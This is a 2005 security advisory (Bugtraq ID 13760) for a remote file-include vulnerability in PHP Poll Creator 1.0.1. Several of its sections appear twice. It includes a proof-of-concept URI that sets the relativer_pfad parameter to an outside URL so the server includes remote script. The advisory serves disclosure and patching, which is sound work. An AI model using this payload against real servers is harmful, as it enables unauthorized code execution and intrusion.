PHP Poll Creator Poll_Vote.PHP Remote File Include Vulnerability
BID:13760
Info
PHP Poll Creator Poll_Vote.PHP Remote File Include Vulnerability
| Bugtraq ID: | 13760 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 25 2005 12:00AM |
| Updated: | Oct 23 2006 08:38PM |
| Credit: | rash ilusion <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
php PC PHP Poll Creator 1.0.1 |
| Not Vulnerable: |
php PC PHP Poll Creator 1.04 |
Discussion
PHP Poll Creator Poll_Vote.PHP Remote File Include Vulnerability
PHP Poll Creator is affected by a remote file-include vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
UPDATE: Further information shows that this issue does not affect version 1.04.
PHP Poll Creator is affected by a remote file-include vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
UPDATE: Further information shows that this issue does not affect version 1.04.
Exploit / POC
PHP Poll Creator Poll_Vote.PHP Remote File Include Vulnerability
No exploit is required.
The following proof-of-concept URI is available:
http://www.example.com/poll_vote.php?relativer_pfad=http://www.example.com/
No exploit is required.
The following proof-of-concept URI is available:
http://www.example.com/poll_vote.php?relativer_pfad=http://www.example.com/
Solution / Fix
PHP Poll Creator Poll_Vote.PHP Remote File Include Vulnerability
Solution:
This issue does not affect version 1.04.
Symantec is currently unaware of exactly when this issue was fixed and if it was fixed intentionally.
Please see the references for more information.
php PC PHP Poll Creator 1.0.1
Solution:
This issue does not affect version 1.04.
Symantec is currently unaware of exactly when this issue was fixed and if it was fixed intentionally.
Please see the references for more information.
php PC PHP Poll Creator 1.0.1
-
php PC Poll Creator version 1.04
http://www.phppc.de/download/phppc_104.zip
References
PHP Poll Creator Poll_Vote.PHP Remote File Include Vulnerability
References:
References:
- PHP Poll Creator Homepage (php PC)